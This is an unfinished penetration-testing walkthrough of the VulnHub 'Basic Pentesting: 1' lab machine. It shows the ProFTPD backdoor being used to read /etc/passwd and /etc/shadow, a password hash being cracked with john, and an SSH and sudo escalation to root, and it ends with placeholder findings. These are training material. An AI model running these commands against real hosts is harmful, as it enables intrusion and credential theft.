Basic Pentesting: 1 - Boot-to-Root Walkthrough
Contents
Objective
Explore multiple remote vulnerabilities and multiple privilege escalation vectors to gain access to and gain root privileges on the target host.
Source: [VulnHub.com]
Status: [Work in progress]
Methodology
Discovery
# Nmap 7.60 scan initiated Tue Apr 3 07:31:41 2018 as: nmap -O -sT -sV -p- -T5 -oN nmap.txt 192.168.56.102
Nmap scan report for 192.168.56.102
Host is up (0.00088s latency).
Not shown: 65532 closed ports
PORT STATE SERVICE VERSION
21/tcp open ftp ProFTPD 1.3.3c
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 (Ubuntu Linux; protocol 2.0)
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
MAC Address: 08:00:27:14:06:50 (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.8
Network Distance: 1 hop
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Tue Apr 3 07:32:08 2018 -- 1 IP address (1 host up) scanned in 26.77 seconds
Port 21 / ProFTPD 1.3.3c looks interesting - ProFTPd1.3 is known to be prone to RCE so let's go for the low hanging fruit first
Entry Point #1 - Port 21 (FTP)
Tools: nmap
# Nmap 7.60 scan initiated Tue Apr 3 07:33:26 2018 as: nmap -p 21 --script ftp* -oN nmap_ftp.txt 192.168.56.102
Nmap scan report for 192.168.56.102
Host is up (0.00033s latency).
PORT STATE SERVICE
21/tcp open ftp
| ftp-brute:
| Accounts: No valid accounts found
|_ Statistics: Performed 8420 guesses in 608 seconds, average tps: 13.5
| ftp-proftpd-backdoor:
| This installation has been backdoored.
| Command: id
|_ Results: uid=0(root) gid=0(root) groups=0(root),65534(nogroup)
MAC Address: 08:00:27:14:06:50 (Oracle VirtualBox virtual NIC)
# Nmap done at Tue Apr 3 07:43:48 2018 -- 1 IP address (1 host up) scanned in 621.71 seconds
Voila! We can haz root! Let's try the exploit
root@kali:~/Desktop/Basic_Pentesting_1# nmap --script ftp-proftpd-backdoor --script-args 'cmd=cat /etc/passwd' -p 21 192.168.56.102 |grep "/bin/bash"
| Results: root:x:0:0:root:/root:/bin/bash
| marlinspike:x:1000:1000:marlinspike,,,:/home/marlinspike:/bin/bash
root@kali:~/Desktop/Basic_Pentesting_1# nmap --script ftp-proftpd-backdoor --script-args 'cmd=cat /etc/shadow' -p 21 192.168.56.102 |grep -E "(root|marlinspike)"
| Results: root:!:17484:0:99999:7:::
| marlinspike:$6$wQb5nV3T$xB2WO/jOkbn4t1RUILrckw69LR/0EMtUbFFCYpM3MUHVmtyYW9.ov/aszTpWhLaC2x6Fvy5tpUUxQbUhCKbl4/:17484:0:99999:7:::
root@kali:~/Desktop/Basic_Pentesting_1# echo "marlinspike:$6$wQb5nV3T$xB2WO/jOkbn4t1RUILrckw69LR/0EMtUbFFCYpM3MUHVmtyYW9.ov/aszTpWhLaC2x6Fvy5tpUUxQbUhCKbl4/" > john.txt
root@kali:~/Desktop/Basic_Pentesting_1# john john.txt
Warning: detected hash type "sha512crypt", but the string is also recognized as "crypt"
Use the "--format=crypt" option to force loading these as that type instead
Using default input encoding: UTF-8
Loaded 1 password hash (sha512crypt, crypt(3) $6$ [SHA512 128/128 AVX 2x])
Press 'q' or Ctrl-C to abort, almost any other key for status
marlinspike (marlinspike)
1g 0:00:00:00 DONE 1/3 (2018-04-03 08:08) 7.142g/s 57.14p/s 57.14c/s 57.14C/s marlinspike..marlinspikes
Use the "--show" option to display all of the cracked passwords reliably
Session completed
root@kali:~/Desktop/Basic_Pentesting_1# ssh marlinspike@vtcsec
The authenticity of host 'vtcsec (192.168.56.102)' can't be established.
ECDSA key fingerprint is SHA256:VpmqtJLBtzleV/ibg84tX0hax9+PC3nojkEOPOVhdJU.
Are you sure you want to continue connecting (yes/no)? yes
Warning: Permanently added 'vtcsec,192.168.56.102' (ECDSA) to the list of known hosts.
marlinspike@vtcsec's password:
Welcome to Ubuntu 16.04.3 LTS (GNU/Linux 4.10.0-28-generic x86_64)
......
marlinspike@vtcsec:~$
marlinspike@vtcsec:~$ sudo -l
[sudo] password for marlinspike:
Matching Defaults entries for marlinspike on vtcsec:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User marlinspike may run the following commands on vtcsec:
(ALL : ALL) ALL
marlinspike@vtcsec:~$ sudo su -
root@vtcsec:~#
We have root!
Entry Point #2 - Port 80 (HTTP)
Tools: nmap, nc
- Nikto v2.1.6/2.1.5
+ Target Host: 192.168.56.103
+ Target Port: 80
+ GET Server leaks inodes via ETags, header found with file /, fields: 0xb1 0x55e1c7758dcdb
+ GET The anti-clickjacking X-Frame-Options header is not present.
+ GET The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ GET The X-Content-Type-Options header is not set.
+ OPTIONS Allowed HTTP Methods: POST, OPTIONS, GET, HEAD
+ GET Uncommon header 'link' found, with contents: <http://vtcsec/secret/index.php/wp-json/>; rel="https://api.w.org/"
+ OSVDB-3092: GET /secret/: This might be interesting...
+ OSVDB-3233: GET /icons/README: Apache default file found.
Two things pop right away:
- Possible Wordpress installation
- 'vtcsec' hostname
<< to be continued >>
Recommendations
Appendix A: Vulnerability Detail and Mitigation
Rating | High |
Description | xxxxxx |
Impact | xxxxx |
Remediation | xxxxx |
Rating | High |
Description | xxxxxx |
Impact | xxxxx |
Remediation | xxxxx |
Rating | High |
Description | xxxxxx |
Impact | xxxxx |
Remediation | xxxxx |
Rating | High |
Description | Unix file permissions for /etc/shadow are incorrect. |
Impact | Allow any user with a shell to access this file and extract password hashes which can be further passed to a password cracking utility to extract user credentials. |
Remediation | Set unix file permissions for /etc/shadow to "600" and change ownership to root:root |